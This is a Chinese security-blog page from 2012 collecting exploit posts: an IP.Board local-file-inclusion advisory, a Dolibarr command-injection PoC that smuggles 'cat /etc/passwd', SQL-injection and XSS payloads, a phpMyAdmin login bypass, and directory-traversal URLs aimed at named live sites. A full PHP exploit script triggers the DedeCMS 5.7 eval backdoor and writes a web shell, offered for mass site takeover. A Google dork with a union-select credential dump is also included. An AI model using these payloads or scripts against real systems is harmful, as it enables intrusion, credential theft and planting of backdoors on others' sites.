影子鹰安全网络-主站技术BLOG

Local File Inclusion in Invision Power Board 3.3.0

kawen

Author: Janek Vind "waraxe"
Date: 12. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-86.html
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2226

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet
forum software produced by Invision Power Services, Inc.
It is written in PHP and primarily uses MySQL as a database management system,
although support for other database engines is available.

Vulnerable versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

Affected are Invision Power Board versions 3.3.0 and 3.2.3, older versions
may be vulnerable as well.

########################################################################
#######
1. Local File Inclusion in "like.php" function "_unsubscribe"
########################################################################
#######

CVE Information:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2012-2226 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

Vulnerability Details:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~
Reason: using unsanitized user submitted data for file operations
Attack vector: user submitted GET parameter "key"
Preconditions:
1. attacker must be logged in as valid user
2. PHP must be < 5.3.4 for null-byte attacks to work
Result: remote file disclosure, php remote code execution

Source code snippet from vulnerable script "like.php":
-----------------[ source code start ]---------------------------------
protected function _unsubscribe()
{
/* Fetch data */
$key = trim( IPSText::base64_decode_urlSafe( $this->request['key'] ) );

list( $app, $area, $relId, $likeMemberId, $memberId, $email ) = explode( ';', $key );

/* Member? */
if ( ! $this->memberData['member_id'] )
{
$this->registry->output->showError( 'no_permission', 'pcgl-1' );
}

if ( ! $app || ! $area || ! $relId )
{
$this->registry->output->showError( 'no_permission', 'pcgl-1' );
}

if ( ( $memberId != $likeMemberId ) || ( $memberId != $this->memberData['member_id'] ) )
{
$this->registry->output->showError( 'no_permission', 'pcgl-2' );
}

if ( $email != $this->memberData['email'] )
{
$this->registry->output->showError( 'no_permission', 'pcgl-3' );
}

/* Think we're safe... */
$this->_like = classes_like::bootstrap( $app, $area );
-----------------[ source code end ]-----------------------------------

As seen above, user submitted parameter "key" is first base64 decoded and then
splitted to six variables. After multiple checks function "bootstrap()" is called,
using unvalidated user submitted data for arguments.

Source code snippet from vulnerable script "composite.php":
-----------------[ source code start ]---------------------------------
static public function bootstrap( $app=null, $area=null )
{
..
if( $area != 'default' )
{
$_file = IPSLib::getAppDir( $app ) . '/extensions/like/' . $area . '.php';
..
}
..
if ( ! is_file( $_file ) )
{
..
throw new Exception( "No like class available for $app - $area" );
..
}
..
$classToLoad = IPSLib::loadLibrary( $_file, $_class, $app );
-----------------[ source code end ]-----------------------------------

We can see, that variable "$_file" is composed using unvalidated argument "area".
Next there is check for file existence and in case of success next function,
"loadLibrary", is called, using unvalidated argument "$_file".

Source code snippet from vulnerable script "core.php":
-----------------[ source code start ]---------------------------------
static public function loadLibrary( $filePath, $className, $app='core' )
{
/* Get the class */
if ( $filePath != '' )
{
require_once( $filePath );/*noLibHook*/
}
-----------------[ source code end ]-----------------------------------

As seen above, "require_once" function is used with unvalidated argument.

Test: we need to construct specific base64 encoded payload.
First, semicolon-separated string:

forums;/../../test;1;1;1;come2waraxe (at) yahoo (dot) com [email concealed]

Email address and other components must be valid for successful test.

After base64 encoding:

Zm9ydW1zOy8uLi8uLi90ZXN0OzE7MTsxO2NvbWUyd2FyYXhlQHlhaG9vLmNvbQ

Now let's log in as valid user and then issue GET request:

http://localhost/ipb330/index.php?app=core&module=global§ion=like
&do=unsubscribe&key=Zm9ydW1zOy8uLi8uLi90ZXN0OzE7MTsxO2NvbWUyd2FyYXhlQHlh
aG9vLmNvbQ

Result:

Fatal error: Uncaught exception 'Exception' with message 'No like class available
for forums - /../../test' in C:\apache_www\ipb330\admin\sources\classes\like\composite.php:333
Stack trace: #0 C:\apache_www\ipb330\admin\applications\core\modules_public\global\like.
php(131):
classes_like::bootstrap('forums', '/../../test')
#1 C:\apache_www\ipb330\admin\applications\core\modules_public\global\like.
php(44):
public_core_global_like->_unsubscribe()
#2 C:\apache_www\ipb330\admin\sources\base\ipsController.php(306):
public_core_global_like->doExecute(Object(ipsRegistry)) #3
C:\apache_www\ipb330\admin\sources\base\ipsController.php(120): ipsCommand->execute(Object(ipsRegistry))
#4 C:\apache_www\ipb330\admin\sources\base\ipsController.php(65): ipsController->handleRequest()
#5 C:\apache_www\ipb330\index.php(26): ipsController::run()
#6 {main} thrown in C:\apache_www\ipb330\admin\sources\classes\like\composite.php on line 333

Potential attack scenario:

1. Attacker registers to target forum and logs in as valid user
2. Attacker uploads avatar picture with malicious php code to target server
3. Attacker issues carefully crafted GET or POST request and as result gets php level access

There are many other ways to exploit LFI (Local File Inclusion) vulnerabilities,
for example by using procfs ("proc/self/environ") on *nix platforms.

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~

Update to new version 3.3.1

http://community.invisionpower.com/topic/360518-ipboard-331-ipblog-252-i
pseo-152-and-updates-for-ipboard-32x-ipgallery-42x-released/

Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~

27.03.2012 Developers contacted via email
28.03.2012 Developers confirmed upcoming patch
11.04.2012 Developers announced new version release
12.04.2012 Advisory released

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~

come2waraxe (at) yahoo (dot) com [email concealed]
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/

PHPmyadmin 2.11.4万能密码漏洞

kawen

PHPmyadmin 2.11.4

PHPmyadmin 2.11.3

两个版本都有此漏洞

我去测试了一下确实可以用。。。

给你找到一个测试网址http://www.hitag.cn

你们可以试一下

只需要输入账号密码不需要输入

利用代码如下：
‘localhost’@'@”

Dolibarr ERP & CRM OS Command Injection

kawen

Dolibarr ERP & CRM OS Command Injection

===================================



1. Advisory Information

Date published: 2012-4-6

Vendors contacted: Dolibarr

Release mode: Coordinated release



2. Vulnerability Information

Class: Injection

Remotely Exploitable: Yes

Locally Exploitable: Yes



3. Software Description

Dolibarr ERP & CRM is a modern web software to manage your activity (contacts, invoices, orders, stocks, agenda, etc...). It's an opensource and free software designed for small companies, foundations and freelances.



4. Vulnerability Description

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker�s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.



5. Vulnerable packages

Dolibarr <= 3.1.1

Dolibarr <= 3.2.0



6. Non-vulnerable packages

Vendor said that the vulnerability was fixed in Development version of 3.2.X branch. However, the fix for 3.1.X branch will be published by June. Vendor accepted the public disclosure of this vulnerability.



7. Credits

This vulnerability was discovered by Nahuel Grisolia

( nahuel @ cintainfinita.com.ar )



8. Technical Description

8.1. OS Command Injection � PoC Example

CVSSv2 Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)

Dolibarr is prone to remote command execution vulnerability because the software fails to adequately sanitize user-supplied input.

A command injection attack can be executed if specially crafted parameters are sent.

Successful attacks can compromise the affected Web Server and its software.

The following proof of concept is given:

POST /dolibarr/admin/tools/export.php HTTP/1.1

[�]

Cookie: DOLSESSID_[�]=[�]



token=[...]&export_type=server&what=mysql&mysqldump=%2Fusr%2Fbin%2Fmysqldump&use_transaction=yes&disable_fk=yes&sql_compat=;cat

/etc/passwd > /tmp/cintainfinitapasswd;&sql_structure=structure&drop=1&sql_data=data&showcolumns=yes&extended_ins=yes&delayed=yes&sql_ignore=yes&hexforbinary=yes&filename_template=mysqldump_dolibarrdebian_3.1.1_201203231716.sql&compression=none





9. Report Timeline

* 2012-03-26 / Vendor notification

* 2012-03-27 / Vulnerability details sent to Vendor

* 2012-03-27 / Vendor fix � See 6. Non-vulnerable packages

* 2012-04-06 / Public Disclosure � PoC attached

ZTE Change admin password

kawen

Exploit By Nuevo Asesino

将博 CMS Powered by JumbotCms 漏洞

kawen

程序版本：3.1.3.3

利用方式：

利用IIS6.0解析漏洞

http://www.hackqing.com/cmsfile/fckeditor/editor/filemanager/browser/default/connectors/test.htm

遍历目录漏洞

http://www.hackqing.com/cmsfile/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

'e-ticketing' SQL Injection (CVE-2012-1673)

kawen

'e-ticketing' SQL Injection (CVE-2012-1673)

Mark Stanislav - mark.stanislav@gmail.com





I. DESCRIPTION

---------------------------------------

A vulnerability exists in loginscript.php that allows for SQL injection of the 'user_name' and 'password' POST parameters.





II. TESTED VERSION

---------------------------------------

Released on 2011-11-30 (no versioning used)





III. PoC EXPLOIT

---------------------------------------

POST a form to loginscript.php with the value of 'password' set to: ' UNION SELECT * from user where user_name = 'admin





IV. SOLUTION

---------------------------------------

Do not use this software, no patched version exists at this time.





V. REFERENCES

---------------------------------------

http://sourceforge.net/projects/e-ticketing/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1673





VI. TIMELINE

---------------------------------------

03/01/2012 - Initial vendor disclosure

03/03/2012 - Vendor response and commitment to fix

03/20/2012 - Follow-up e-mail to vendor as no patched version was published yet

04/04/2012 - Public disclosure

SyndeoCMS <= 3.0.01 Persistent XSS

kawen

1)Introduction

SyndeoCMS is a "Content Management System (CMS) for primary schools, which helps you manage and maintain your website. It can also

be a very usefull CMS for small companies or non profit organizations".



2)Description

SyndeoCMS 3.0.01 (and lower) is prone to a persistent XSS vulnerability due to an improper input sanitization of

"email" parameter, passed to server side logic (path: "starnet/index.php") via http POST method.

Exploiting this vulnerability an authenticated user - which is able to change his profile settings - could insert arbitrary

code in "Site email" field that will be executed when another admin or user clicks on that user'profile.



3)Exploit

Insert the following code in "Email address" field under

"starnet/index.php?option=configuration&suboption=users&modoption=edit_user&user_id=":

email@email.com">

dedecms 5.7 一句话后门利用 exp

kawen

前段时间乌云爆料DEDE5.7爆出shopcar.class.php包含一句话木马，@eval(file_get_contents('php://input'));。详情可查看乌云http://www.wooyun.org/bug.php?action=view&id=5416。此EXP可激活此版本中的一句话后门。
class MemberShops
{
var $OrdersId;
var $productsId;
function __construct()
{
$this->OrdersId = $this->getCookie("OrdersId");
if(empty($this->OrdersId))
{
$this->OrdersId = $this->MakeOrders();
}
@eval(file_get_contents('php://input'));
}
function MemberShops()
{
$this->__construct();
}shopcar.class.php 文件中只有一个 MemberShops 类，构造函数里面出现了后门，当类被实例化的时候就会自动执行构造函数，程序猿你懂的。。。

eval 执行和 file_get_contents 获取内容不用说了，php://input 这个是输入流，接收的是 post 内容，但是 post 类型不能为 multipart/form-data

在 eclipse 里搜索 new MemberShops, 找到 /plus/car.php 里面实例化了这个类，

require_once (dirname(__FILE__) . "/../include/common.inc.php");
define('_PLUS_TPL_', DEDEROOT.'/templets/plus');
require_once(DEDEINC.'/dedetemplate.class.php');
require_once DEDEINC.'/shopcar.class.php';
require_once DEDEINC.'/memberlogin.class.php';
$cart = new MemberShops();

大家关心的都是漏洞利用而不是漏洞出现的原因，现在我附上EXP可以批量拿这些DEDE站。
注意前天 3.21中午 DEDE已经把此版本中的后门清空了，此EXP只能拿官方清空以前从官网下载了5.7版本安装的网站，希望大家注意。特别说明：在舞林给出的exp的基础上修改而来！使自定义目标网站和目录更方便。

dedecms 5.7 一句话后门利用 exp
漏洞证明：

dedecms 5.7 一句话后门利用 exp

dedecms 5.7 一句话后门利用 exp
$host=$argv[1];
$path=$argv[2];
$path=$path."plus/car.php";
$url=$path;
if(count($argv) < 3 ){
print_r('
Usage: php '.$argv[0].' host path
Example:
php '.$argv[0].' www.site.com /dede/
作者：舞林 http://t.qq.com/wulinlw
修改：小逸
');
exit;
}
$data='$a=${@phpinfo()};';
$buffer = POST($host,80,$url,$data,30);
preg_match("/allow_url_fopen/i", $buffer, $arr_suc);

$str="allow_url_fopen";
if($arr_suc[0]==$str) {
echo "Congratulations,target exist this bug.\n";
$data='$a=${@file_put_contents("dst.php","")};';
$buffer = POST($host,80,$url,$data,30);
echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";
}
else {
echo "Sorry,target may not exist this bug.";
exit;
}
function POST($host,$port,$path,$data,$timeout, $cookie='') {
$buffer='';
$fp = fsockopen($host,$port,$errno,$errstr,$timeout);
if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
else {
fputs($fp, "POST $path HTTP/1.0\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($data)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data."\r\n\r\n");

while(!feof($fp))
{
$buffer .= fgets($fp,4096);
}
fclose($fp);
}
return $buffer;
}
?>

dedecms 5.7 一句话后门利用 exp
修复方案：
删除shopcar.class.php文件中的，@eval(file_get_contents('php://input'));。

vBshop persistent Persisstant XSS

kawen

Go to vBshop

Gift an item to aother user.

In the 'message to user' put:

  " target="_blank">https://www.bugabuse.net/';

Send the item off.

Go to the users profile that you gifted

Boom. Pers. XSS.

Edit to your likeing.

Content-Management-System Remote SQL Injection

kawen

Content-Management-System Remote SQL Injection (news.php)

## Injection Point : /news.php?id=-9 [ SQL ]



## Dork: intext:"Powered by Content-Management-System " © Tim Hendriks 2008 " + inurl:news.php?id=



## Exploit Code: /news.php?id=-9 union select 1,2,3,4,group_concat(username,0x3a,pass,0x3a,email))from cms_users--





## Example: http://www.boom-trikes.de/news.php?id=-9 union select 1,2,3,4,group_concat(username,0x3a,pass,0x3a,email))from cms_users--



## Login Admin Panel : http://server/cms/